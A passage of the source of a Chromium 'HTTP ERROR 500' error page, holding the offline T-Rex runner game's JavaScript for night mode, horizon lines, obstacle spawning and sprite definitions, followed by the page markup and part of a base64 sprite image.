    // Set moon positioning.
    if (this.opacity > 0) {
      this.xPos = this.updateXPos(this.xPos, NightMode.config.MOON_SPEED);

      // Update stars.
      if (this.drawStars) {
        for (let i = 0; i < NightMode.config.NUM_STARS; i++) {
          this.stars[i].x =
              this.updateXPos(this.stars[i].x, NightMode.config.STAR_SPEED);
        }
      }
      this.draw();
    } else {
      this.opacity = 0;
      this.placeStars();
    }
    this.drawStars = true;
  },

  updateXPos(currentPos, speed) {
    if (currentPos < -NightMode.config.WIDTH) {
      currentPos = this.containerWidth;
    } else {
      currentPos -= speed;
    }
    return currentPos;
  },

  draw() {
    let moonSourceWidth = this.currentPhase === 3 ? NightMode.config.WIDTH * 2 :
                                                    NightMode.config.WIDTH;
    let moonSourceHeight = NightMode.config.HEIGHT;
    let moonSourceX = this.spritePos.x + NightMode.phases[this.currentPhase];
    const moonOutputWidth = moonSourceWidth;
    let starSize = NightMode.config.STAR_SIZE;
    let starSourceX = Runner.spriteDefinitionByType.original.LDPI.STAR.x;

    if (IS_HIDPI) {
      moonSourceWidth *= 2;
      moonSourceHeight *= 2;
      moonSourceX = this.spritePos.x +
          (NightMode.phases[this.currentPhase] * 2);
      starSize *= 2;
      starSourceX = Runner.spriteDefinitionByType.original.HDPI.STAR.x;
    }

    this.canvasCtx.save();
    this.canvasCtx.globalAlpha = this.opacity;

    // Stars.
    if (this.drawStars) {
      for (let i = 0; i < NightMode.config.NUM_STARS; i++) {
        this.canvasCtx.drawImage(
            Runner.origImageSprite, starSourceX, this.stars[i].sourceY,
            starSize, starSize, Math.round(this.stars[i].x), this.stars[i].y,
            NightMode.config.STAR_SIZE, NightMode.config.STAR_SIZE);
      }
    }

    // Moon.
    this.canvasCtx.drawImage(
        Runner.origImageSprite, moonSourceX, this.spritePos.y, moonSourceWidth,
        moonSourceHeight, Math.round(this.xPos), this.yPos, moonOutputWidth,
        NightMode.config.HEIGHT);

    this.canvasCtx.globalAlpha = 1;
    this.canvasCtx.restore();
  },

  // Do star placement.
  placeStars() {
    const segmentSize = Math.round(this.containerWidth /
        NightMode.config.NUM_STARS);

    for (let i = 0; i < NightMode.config.NUM_STARS; i++) {
      this.stars[i] = {};
      this.stars[i].x = getRandomNum(segmentSize * i, segmentSize * (i + 1));
      this.stars[i].y = getRandomNum(0, NightMode.config.STAR_MAX_Y);

      if (IS_HIDPI) {
        this.stars[i].sourceY =
            Runner.spriteDefinitionByType.original.HDPI.STAR.y +
            NightMode.config.STAR_SIZE * 2 * i;
      } else {
        this.stars[i].sourceY =
            Runner.spriteDefinitionByType.original.LDPI.STAR.y +
            NightMode.config.STAR_SIZE * i;
      }
    }
  },

  reset() {
    this.currentPhase = 0;
    this.opacity = 0;
    this.update(false);
  },

};


//******************************************************************************

/**
 * Horizon Line.
 * Consists of two connecting lines. Randomly assigns a flat / bumpy horizon.
 * @param {HTMLCanvasElement} canvas
 * @param {Object} lineConfig Configuration object.
 * @constructor
 */
function HorizonLine(canvas, lineConfig) {
  let sourceX = lineConfig.SOURCE_X;
  let sourceY = lineConfig.SOURCE_Y;

  if (IS_HIDPI) {
    sourceX *= 2;
    sourceY *= 2;
  }

  this.spritePos = {x: sourceX, y: sourceY};
  this.canvas = canvas;
  this.canvasCtx =
      /** @type {CanvasRenderingContext2D} */ (canvas.getContext('2d'));
  this.sourceDimensions = {};
  this.dimensions = lineConfig;

  this.sourceXPos = [this.spritePos.x, this.spritePos.x +
      this.dimensions.WIDTH];
  this.xPos = [];
  this.yPos = 0;
  this.bumpThreshold = 0.5;

  this.setSourceDimensions(lineConfig);
  this.draw();
}


/**
 * Horizon line dimensions.
 * @enum {number}
 */
HorizonLine.dimensions = {
  WIDTH: 600,
  HEIGHT: 12,
  YPOS: 127,
};


HorizonLine.prototype = {
  /**
   * Set the source dimensions of the horizon line.
   */
  setSourceDimensions(newDimensions) {
    for (const dimension in newDimensions) {
      if (dimension !== 'SOURCE_X' && dimension !== 'SOURCE_Y') {
        if (IS_HIDPI) {
          if (dimension !== 'YPOS') {
            this.sourceDimensions[dimension] = newDimensions[dimension] * 2;
          }
        } else {
          this.sourceDimensions[dimension] = newDimensions[dimension];
        }
        this.dimensions[dimension] = newDimensions[dimension];
      }
    }

    this.xPos = [0, newDimensions.WIDTH];
    this.yPos = newDimensions.YPOS;
  },

  /**
   * Return the crop x position of a type.
   */
  getRandomType() {
    return Math.random() > this.bumpThreshold ? this.dimensions.WIDTH : 0;
  },

  /**
   * Draw the horizon line.
   */
  draw() {
    this.canvasCtx.drawImage(Runner.imageSprite, this.sourceXPos[0],
        this.spritePos.y,
        this.sourceDimensions.WIDTH, this.sourceDimensions.HEIGHT,
        this.xPos[0], this.yPos,
        this.dimensions.WIDTH, this.dimensions.HEIGHT);

    this.canvasCtx.drawImage(Runner.imageSprite, this.sourceXPos[1],
        this.spritePos.y,
        this.sourceDimensions.WIDTH, this.sourceDimensions.HEIGHT,
        this.xPos[1], this.yPos,
        this.dimensions.WIDTH, this.dimensions.HEIGHT);
  },

  /**
   * Update the x position of an indivdual piece of the line.
   * @param {number} pos Line position.
   * @param {number} increment
   */
  updateXPos(pos, increment) {
    const line1 = pos;
    const line2 = pos === 0 ? 1 : 0;

    this.xPos[line1] -= increment;
    this.xPos[line2] = this.xPos[line1] + this.dimensions.WIDTH;

    if (this.xPos[line1] <= -this.dimensions.WIDTH) {
      this.xPos[line1] += this.dimensions.WIDTH * 2;
      this.xPos[line2] = this.xPos[line1] - this.dimensions.WIDTH;
      this.sourceXPos[line1] = this.getRandomType() + this.spritePos.x;
    }
  },

  /**
   * Update the horizon line.
   * @param {number} deltaTime
   * @param {number} speed
   */
  update(deltaTime, speed) {
    const increment = Math.floor(speed * (FPS / 1000) * deltaTime);

    if (this.xPos[0] <= 0) {
      this.updateXPos(0, increment);
    } else {
      this.updateXPos(1, increment);
    }
    this.draw();
  },

  /**
   * Reset horizon to the starting position.
   */
  reset() {
    this.xPos[0] = 0;
    this.xPos[1] = this.dimensions.WIDTH;
  },
};


//******************************************************************************

/**
 * Horizon background class.
 * @param {HTMLCanvasElement} canvas
 * @param {Object} spritePos Sprite positioning.
 * @param {Object} dimensions Canvas dimensions.
 * @param {number} gapCoefficient
 * @constructor
 */
function Horizon(canvas, spritePos, dimensions, gapCoefficient) {
  this.canvas = canvas;
  this.canvasCtx =
      /** @type {CanvasRenderingContext2D} */ (this.canvas.getContext('2d'));
  this.config = Horizon.config;
  this.dimensions = dimensions;
  this.gapCoefficient = gapCoefficient;
  this.obstacles = [];
  this.obstacleHistory = [];
  this.horizonOffsets = [0, 0];
  this.cloudFrequency = this.config.CLOUD_FREQUENCY;
  this.spritePos = spritePos;
  this.nightMode = null;
  this.altGameModeActive = false;

  // Cloud
  this.clouds = [];
  this.cloudSpeed = this.config.BG_CLOUD_SPEED;

  // Background elements
  this.backgroundEls = [];
  this.lastEl = null;
  this.backgroundSpeed = this.config.BG_CLOUD_SPEED;

  // Horizon
  this.horizonLine = null;
  this.horizonLines = [];
  this.init();
}


/**
 * Horizon config.
 * @enum {number}
 */
Horizon.config = {
  BG_CLOUD_SPEED: 0.2,
  BUMPY_THRESHOLD: .3,
  CLOUD_FREQUENCY: .5,
  HORIZON_HEIGHT: 16,
  MAX_CLOUDS: 6,
};


Horizon.prototype = {
  /**
   * Initialise the horizon. Just add the line and a cloud. No obstacles.
   */
  init() {
    Obstacle.types = Runner.spriteDefinitionByType.original.OBSTACLES;
    this.addCloud();
    // Multiple Horizon lines
    for (let i = 0; i < Runner.spriteDefinition.LINES.length; i++) {
      this.horizonLines.push(
          new HorizonLine(this.canvas, Runner.spriteDefinition.LINES[i]));
    }

    this.nightMode = new NightMode(this.canvas, this.spritePos.MOON,
        this.dimensions.WIDTH);
  },

  /**
   * Update obstacle definitions based on the speed of the game.
   */
  adjustObstacleSpeed: function() {
    for (let i = 0; i < Obstacle.types.length; i++) {
      if (Runner.slowDown) {
        Obstacle.types[i].multipleSpeed = Obstacle.types[i].multipleSpeed / 2;
        Obstacle.types[i].minGap *= 1.5;
        Obstacle.types[i].minSpeed = Obstacle.types[i].minSpeed / 2;

        // Convert variable y position obstacles to fixed.
        if (typeof (Obstacle.types[i].yPos) == 'object') {
          Obstacle.types[i].yPos = Obstacle.types[i].yPos[0];
          Obstacle.types[i].yPosMobile = Obstacle.types[i].yPos[0];
        }
      }
    }
  },

  /**
   * Update sprites to correspond to change in sprite sheet.
   * @param {number} spritePos
   */
  enableAltGameMode: function(spritePos) {
    // Clear existing horizon objects.
    this.clouds = [];
    this.backgroundEls = [];

    this.altGameModeActive = true;
    this.spritePos = spritePos;

    Obstacle.types = Runner.spriteDefinition.OBSTACLES;
    this.adjustObstacleSpeed();

    Obstacle.MAX_GAP_COEFFICIENT = Runner.spriteDefinition.MAX_GAP_COEFFICIENT;
    Obstacle.MAX_OBSTACLE_LENGTH = Runner.spriteDefinition.MAX_OBSTACLE_LENGTH;

    BackgroundEl.config = Runner.spriteDefinition.BACKGROUND_EL_CONFIG;

    this.horizonLines = [];
    for (let i = 0; i < Runner.spriteDefinition.LINES.length; i++) {
      this.horizonLines.push(
          new HorizonLine(this.canvas, Runner.spriteDefinition.LINES[i]));
    }
    this.reset();
  },

  /**
   * @param {number} deltaTime
   * @param {number} currentSpeed
   * @param {boolean} updateObstacles Used as an override to prevent
   *     the obstacles from being updated / added. This happens in the
   *     ease in section.
   * @param {boolean} showNightMode Night mode activated.
   */
  update(deltaTime, currentSpeed, updateObstacles, showNightMode) {
    this.runningTime += deltaTime;

    if (this.altGameModeActive) {
      this.updateBackgroundEls(deltaTime, currentSpeed);
    }

    for (let i = 0; i < this.horizonLines.length; i++) {
      this.horizonLines[i].update(deltaTime, currentSpeed);
    }

    if (!this.altGameModeActive || Runner.spriteDefinition.HAS_CLOUDS) {
      this.nightMode.update(showNightMode);
      this.updateClouds(deltaTime, currentSpeed);
    }

    if (updateObstacles) {
      this.updateObstacles(deltaTime, currentSpeed);
    }
  },

  /**
   * Update background element positions. Also handles creating new elements.
   * @param {number} elSpeed
   * @param {Array<Object>} bgElArray
   * @param {number} maxBgEl
   * @param {Function} bgElAddFunction
   * @param {number} frequency
   */
  updateBackgroundEl(elSpeed, bgElArray, maxBgEl, bgElAddFunction, frequency) {
    const numElements = bgElArray.length;

    if (numElements) {
      for (let i = numElements - 1; i >= 0; i--) {
        bgElArray[i].update(elSpeed);
      }

      const lastEl = bgElArray[numElements - 1];

      // Check for adding a new element.
      if (numElements < maxBgEl &&
          (this.dimensions.WIDTH - lastEl.xPos) > lastEl.gap &&
          frequency > Math.random()) {
        bgElAddFunction();
      }
    } else {
      bgElAddFunction();
    }
  },

  /**
   * Update the cloud positions.
   * @param {number} deltaTime
   * @param {number} speed
   */
  updateClouds(deltaTime, speed) {
    const elSpeed = this.cloudSpeed / 1000 * deltaTime * speed;
    this.updateBackgroundEl(
        elSpeed, this.clouds, this.config.MAX_CLOUDS, this.addCloud.bind(this),
        this.cloudFrequency);

    // Remove expired elements.
    this.clouds = this.clouds.filter((obj) => !obj.remove);
  },

  /**
   * Update the background element positions.
   * @param {number} deltaTime
   * @param {number} speed
   */
  updateBackgroundEls(deltaTime, speed) {
    this.updateBackgroundEl(
        deltaTime, this.backgroundEls, BackgroundEl.config.MAX_BG_ELS,
        this.addBackgroundEl.bind(this), this.cloudFrequency);

    // Remove expired elements.
    this.backgroundEls = this.backgroundEls.filter((obj) => !obj.remove);
  },

  /**
   * Update the obstacle positions.
   * @param {number} deltaTime
   * @param {number} currentSpeed
   */
  updateObstacles(deltaTime, currentSpeed) {
    const updatedObstacles = this.obstacles.slice(0);

    for (let i = 0; i < this.obstacles.length; i++) {
      const obstacle = this.obstacles[i];
      obstacle.update(deltaTime, currentSpeed);

      // Clean up existing obstacles.
      if (obstacle.remove) {
        updatedObstacles.shift();
      }
    }
    this.obstacles = updatedObstacles;

    if (this.obstacles.length > 0) {
      const lastObstacle = this.obstacles[this.obstacles.length - 1];

      if (lastObstacle && !lastObstacle.followingObstacleCreated &&
          lastObstacle.isVisible() &&
          (lastObstacle.xPos + lastObstacle.width + lastObstacle.gap) <
          this.dimensions.WIDTH) {
        this.addNewObstacle(currentSpeed);
        lastObstacle.followingObstacleCreated = true;
      }
    } else {
      // Create new obstacles.
      this.addNewObstacle(currentSpeed);
    }
  },

  removeFirstObstacle() {
    this.obstacles.shift();
  },

  /**
   * Add a new obstacle.
   * @param {number} currentSpeed
   */
  addNewObstacle(currentSpeed) {
    const obstacleCount =
        Obstacle.types[Obstacle.types.length - 1].type != 'COLLECTABLE' ||
            (Runner.isAltGameModeEnabled() && !this.altGameModeActive ||
             this.altGameModeActive) ?
        Obstacle.types.length - 1 :
        Obstacle.types.length - 2;
    const obstacleTypeIndex =
        obstacleCount > 0 ? getRandomNum(0, obstacleCount) : 0;
    const obstacleType = Obstacle.types[obstacleTypeIndex];

    // Check for multiples of the same type of obstacle.
    // Also check obstacle is available at current speed.
    if ((obstacleCount > 0 && this.duplicateObstacleCheck(obstacleType.type)) ||
        currentSpeed < obstacleType.minSpeed) {
      this.addNewObstacle(currentSpeed);
    } else {
      const obstacleSpritePos = this.spritePos[obstacleType.type];

      this.obstacles.push(new Obstacle(
          this.canvasCtx, obstacleType, obstacleSpritePos, this.dimensions,
          this.gapCoefficient, currentSpeed, obstacleType.width,
          this.altGameModeActive));

      this.obstacleHistory.unshift(obstacleType.type);

      if (this.obstacleHistory.length > 1) {
        this.obstacleHistory.splice(Runner.config.MAX_OBSTACLE_DUPLICATION);
      }
    }
  },

  /**
   * Returns whether the previous two obstacles are the same as the next one.
   * Maximum duplication is set in config value MAX_OBSTACLE_DUPLICATION.
   * @return {boolean}
   */
  duplicateObstacleCheck(nextObstacleType) {
    let duplicateCount = 0;

    for (let i = 0; i < this.obstacleHistory.length; i++) {
      duplicateCount =
          this.obstacleHistory[i] === nextObstacleType ? duplicateCount + 1 : 0;
    }
    return duplicateCount >= Runner.config.MAX_OBSTACLE_DUPLICATION;
  },

  /**
   * Reset the horizon layer.
   * Remove existing obstacles and reposition the horizon line.
   */
  reset() {
    this.obstacles = [];
    for (let l = 0; l < this.horizonLines.length; l++) {
      this.horizonLines[l].reset();
    }

    this.nightMode.reset();
  },

  /**
   * Update the canvas width and scaling.
   * @param {number} width Canvas width.
   * @param {number} height Canvas height.
   */
  resize(width, height) {
    this.canvas.width = width;
    this.canvas.height = height;
  },

  /**
   * Add a new cloud to the horizon.
   */
  addCloud() {
    this.clouds.push(new Cloud(this.canvas, this.spritePos.CLOUD,
        this.dimensions.WIDTH));
  },

  /**
   * Add a random background element to the horizon.
   */
  addBackgroundEl() {
    const backgroundElTypes =
        Object.keys(Runner.spriteDefinition.BACKGROUND_EL);

    if (backgroundElTypes.length > 0) {
      let index = getRandomNum(0, backgroundElTypes.length - 1);
      let type = backgroundElTypes[index];

      // Add variation if available.
      while (type == this.lastEl && backgroundElTypes.length > 1) {
        index = getRandomNum(0, backgroundElTypes.length - 1);
        type = backgroundElTypes[index];
      }

      this.lastEl = type;
      this.backgroundEls.push(new BackgroundEl(
          this.canvas, this.spritePos.BACKGROUND_EL, this.dimensions.WIDTH,
          type));
    }
  },
};
</script>
  <script>// Copyright 2021 The Chromium Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

/* @const
 * Add matching sprite definition and config to Runner.spriteDefinitionByType.
 */
const GAME_TYPE = [];

/**
 * Obstacle definitions.
 * minGap: minimum pixel space between obstacles.
 * multipleSpeed: Speed at which multiples are allowed.
 * speedOffset: speed faster / slower than the horizon.
 * minSpeed: Minimum speed which the obstacle can make an appearance.
 *
 * @typedef {{
 *   type: string,
 *   width: number,
 *   height: number,
 *   yPos: number,
 *   multipleSpeed: number,
 *   minGap: number,
 *   minSpeed: number,
 *   collisionBoxes: Array<CollisionBox>,
 * }}
 */
let ObstacleType;

/**
 * T-Rex runner sprite definitions.
 */
Runner.spriteDefinitionByType = {
  original: {
    LDPI: {
      BACKGROUND_EL: {x: 86, y: 2},
      CACTUS_LARGE: {x: 332, y: 2},
      CACTUS_SMALL: {x: 228, y: 2},
      OBSTACLE_2: {x: 332, y: 2},
      OBSTACLE: {x: 228, y: 2},
      CLOUD: {x: 86, y: 2},
      HORIZON: {x: 2, y: 54},
      MOON: {x: 484, y: 2},
      PTERODACTYL: {x: 134, y: 2},
      RESTART: {x: 2, y: 68},
      TEXT_SPRITE: {x: 655, y: 2},
      TREX: {x: 848, y: 2},
      STAR: {x: 645, y: 2},
      COLLECTABLE: {x: 2, y: 2},
      ALT_GAME_END: {x: 121, y: 2},
    },
    HDPI: {
      BACKGROUND_EL: {x: 166, y: 2},
      CACTUS_LARGE: {x: 652, y: 2},
      CACTUS_SMALL: {x: 446, y: 2},
      OBSTACLE_2: {x: 652, y: 2},
      OBSTACLE: {x: 446, y: 2},
      CLOUD: {x: 166, y: 2},
      HORIZON: {x: 2, y: 104},
      MOON: {x: 954, y: 2},
      PTERODACTYL: {x: 260, y: 2},
      RESTART: {x: 2, y: 130},
      TEXT_SPRITE: {x: 1294, y: 2},
      TREX: {x: 1678, y: 2},
      STAR: {x: 1276, y: 2},
      COLLECTABLE: {x: 4, y: 4},
      ALT_GAME_END: {x: 242, y: 4},
    },
    MAX_GAP_COEFFICIENT: 1.5,
    MAX_OBSTACLE_LENGTH: 3,
    HAS_CLOUDS: 1,
    BOTTOM_PAD: 10,
    TREX: {
      WAITING_1: {x: 44, w: 44, h: 47, xOffset: 0},
      WAITING_2: {x: 0, w: 44, h: 47, xOffset: 0},
      RUNNING_1: {x: 88, w: 44, h: 47, xOffset: 0},
      RUNNING_2: {x: 132, w: 44, h: 47, xOffset: 0},
      JUMPING: {x: 0, w: 44, h: 47, xOffset: 0},
      CRASHED: {x: 220, w: 44, h: 47, xOffset: 0},
      COLLISION_BOXES: [
        new CollisionBox(22, 0, 17, 16),
        new CollisionBox(1, 18, 30, 9),
        new CollisionBox(10, 35, 14, 8),
        new CollisionBox(1, 24, 29, 5),
        new CollisionBox(5, 30, 21, 4),
        new CollisionBox(9, 34, 15, 4),
      ],
    },
    /** @type {Array<ObstacleType>} */
    OBSTACLES: [
      {
        type: 'CACTUS_SMALL',
        width: 17,
        height: 35,
        yPos: 105,
        multipleSpeed: 4,
        minGap: 120,
        minSpeed: 0,
        collisionBoxes: [
          new CollisionBox(0, 7, 5, 27),
          new CollisionBox(4, 0, 6, 34),
          new CollisionBox(10, 4, 7, 14),
        ],
      },
      {
        type: 'CACTUS_LARGE',
        width: 25,
        height: 50,
        yPos: 90,
        multipleSpeed: 7,
        minGap: 120,
        minSpeed: 0,
        collisionBoxes: [
          new CollisionBox(0, 12, 7, 38),
          new CollisionBox(8, 0, 7, 49),
          new CollisionBox(13, 10, 10, 38),
        ],
      },
      {
        type: 'PTERODACTYL',
        width: 46,
        height: 40,
        yPos: [100, 75, 50],    // Variable height.
        yPosMobile: [100, 50],  // Variable height mobile.
        multipleSpeed: 999,
        minSpeed: 8.5,
        minGap: 150,
        collisionBoxes: [
          new CollisionBox(15, 15, 16, 5),
          new CollisionBox(18, 21, 24, 6),
          new CollisionBox(2, 14, 4, 3),
          new CollisionBox(6, 10, 4, 7),
          new CollisionBox(10, 8, 6, 9),
        ],
        numFrames: 2,
        frameRate: 1000 / 6,
        speedOffset: .8,
      },
    ],
    BACKGROUND_EL: {
      'CLOUD': {
        HEIGHT: 14,
        MAX_CLOUD_GAP: 400,
        MAX_SKY_LEVEL: 30,
        MIN_CLOUD_GAP: 100,
        MIN_SKY_LEVEL: 71,
        OFFSET: 4,
        WIDTH: 46,
        X_POS: 1,
        Y_POS: 120,
      },
    },
    BACKGROUND_EL_CONFIG: {
      MAX_BG_ELS: 1,
      MAX_GAP: 400,
      MIN_GAP: 100,
      POS: 0,
      SPEED: 0.5,
      Y_POS: 125,
    },
    LINES: [
      {SOURCE_X: 2, SOURCE_Y: 52, WIDTH: 600, HEIGHT: 12, YPOS: 127},
    ],
  },
};
</script>
  
</head>
<body id="t" class="neterror" style="font-family: &quot;sans&quot;, Arial, sans-serif; font-size: 75%" jstcache="0">
  <div id="main-frame-error" class="interstitial-wrapper" jstcache="0">
    <div id="main-content" jstcache="0">
      <div class="icon icon-generic" jstcache="0"></div>
      <div id="main-message" jstcache="0">
        <h1 jstcache="0">
          <span jsselect="heading" jsvalues=".innerHTML:msg" jstcache="9">This page isn’t working</span>
          <a id="error-information-button" class="hidden" onclick="toggleErrorInformationPopup();" jstcache="0"></a>
        </h1>
        <p jsselect="summary" jsvalues=".innerHTML:msg" jstcache="1"><strong jscontent="hostName" jstcache="22">localhost</strong> is currently unable to handle this request.</p>
        <!--The suggestion list and error code are normally presented inline,
          in which case error-information-popup-* divs have no effect. When
          error-information-popup-container has the use-popup-container class, this
          information is provided in a popup instead.-->
        <div id="error-information-popup-container" jstcache="0">
          <div id="error-information-popup" jstcache="0">
            <div id="error-information-popup-box" jstcache="0">
              <div id="error-information-popup-content" jstcache="0">
                <div id="suggestions-list" style="display:none" jsdisplay="(suggestionsSummaryList &amp;&amp; suggestionsSummaryList.length)" jstcache="16">
                  <p jsvalues=".innerHTML:suggestionsSummaryListHeader" jstcache="18"></p>
                  <ul jsvalues=".className:suggestionsSummaryList.length == 1 ? 'single-suggestion' : ''" jstcache="19">
                    <li jsselect="suggestionsSummaryList" jsvalues=".innerHTML:summary" jstcache="21"></li>
                  </ul>
                </div>
                <div class="error-code" jscontent="errorCode" jstcache="17">HTTP ERROR 500</div>
                <p id="error-information-popup-close" jstcache="0">
                  <a class="link-button" jscontent="closeDescriptionPopup" onclick="toggleErrorInformationPopup();" jstcache="20">null</a>
                </p>
              </div>
            </div>
          </div>
        </div>
        <div id="download-links-wrapper" class="hidden" jstcache="0">
          <div id="download-link-wrapper" jstcache="0">
            <a id="download-link" class="link-button" onclick="downloadButtonClick()" jsselect="downloadButton" jscontent="msg" jsvalues=".disabledText:disabledMsg" jstcache="6" style="display: none;">
            </a>
          </div>
          <div id="download-link-clicked-wrapper" class="hidden" jstcache="0">
            <div id="download-link-clicked" class="link-button" jsselect="downloadButton" jscontent="disabledMsg" jstcache="11" style="display: none;">
            </div>
          </div>
        </div>
        <div id="save-page-for-later-button" class="hidden" jstcache="0">
          <a class="link-button" onclick="savePageLaterClick()" jsselect="savePageLater" jscontent="savePageMsg" jstcache="10" style="display: none;">
          </a>
        </div>
        <div id="cancel-save-page-button" class="hidden" onclick="cancelSavePageClick()" jsselect="savePageLater" jsvalues=".innerHTML:cancelMsg" jstcache="4" style="display: none;">
        </div>
        <div id="offline-content-list" class="list-hidden" hidden="" jstcache="0">
          <div id="offline-content-list-visibility-card" onclick="toggleOfflineContentListVisibility(true)" jstcache="0">
            <div id="offline-content-list-title" jsselect="offlineContentList" jscontent="title" jstcache="12" style="display: none;">
            </div>
            <div jstcache="0">
              <div id="offline-content-list-show-text" jsselect="offlineContentList" jscontent="showText" jstcache="14" style="display: none;">
              </div>
              <div id="offline-content-list-hide-text" jsselect="offlineContentList" jscontent="hideText" jstcache="15" style="display: none;">
              </div>
            </div>
          </div>
          <div id="offline-content-suggestions" jstcache="0"></div>
          <div id="offline-content-list-action" jstcache="0">
            <a class="link-button" onclick="launchDownloadsPage()" jsselect="offlineContentList" jscontent="actionText" jstcache="13" style="display: none;">
            </a>
          </div>
        </div>
      </div>
    </div>
    <div id="buttons" class="nav-wrapper suggested-right" jstcache="0">
      <div id="control-buttons" jstcache="0">
        <button id="reload-button" class="blue-button text-button" onclick="reloadButtonClick(this.url);" jsselect="reloadButton" jsvalues=".url:reloadUrl" jscontent="msg" jstcache="5">Reload</button>
        <button id="download-button" class="blue-button text-button" onclick="downloadButtonClick()" jsselect="downloadButton" jscontent="msg" jsvalues=".disabledText:disabledMsg" jstcache="6" style="display: none;">
        </button>
      </div>
      <button id="details-button" class="secondary-button text-button small-link" onclick="detailsButtonClick(); toggleHelpBox()" jscontent="details" jsdisplay="(suggestionsDetails &amp;&amp; suggestionsDetails.length > 0) || diagnose" jsvalues=".detailsText:details; .hideDetailsText:hideDetails;" jstcache="2" style="display: none;"></button>
    </div>
    <div id="details" class="hidden" jstcache="0">
      <div class="suggestions" jsselect="suggestionsDetails" jstcache="3" jsinstance="*0" style="display: none;">
        <div class="suggestion-header" jsvalues=".innerHTML:header" jstcache="7"></div>
        <div class="suggestion-body" jsvalues=".innerHTML:body" jstcache="8"></div>
      </div>
    </div>
  </div>
  <div id="sub-frame-error" jstcache="0">
    <!-- Show details when hovering over the icon, in case the details are
         hidden because they're too large. -->
    <div class="icon" jstcache="0"></div>
    <div id="sub-frame-error-details" jsselect="summary" jsvalues=".innerHTML:msg" jstcache="1"><strong jscontent="hostName" jstcache="22">localhost</strong> is currently unable to handle this request.</div>
  </div>

  <div id="offline-resources" jstcache="0">
    <img id="offline-resources-1x" src="data:image/png;base64,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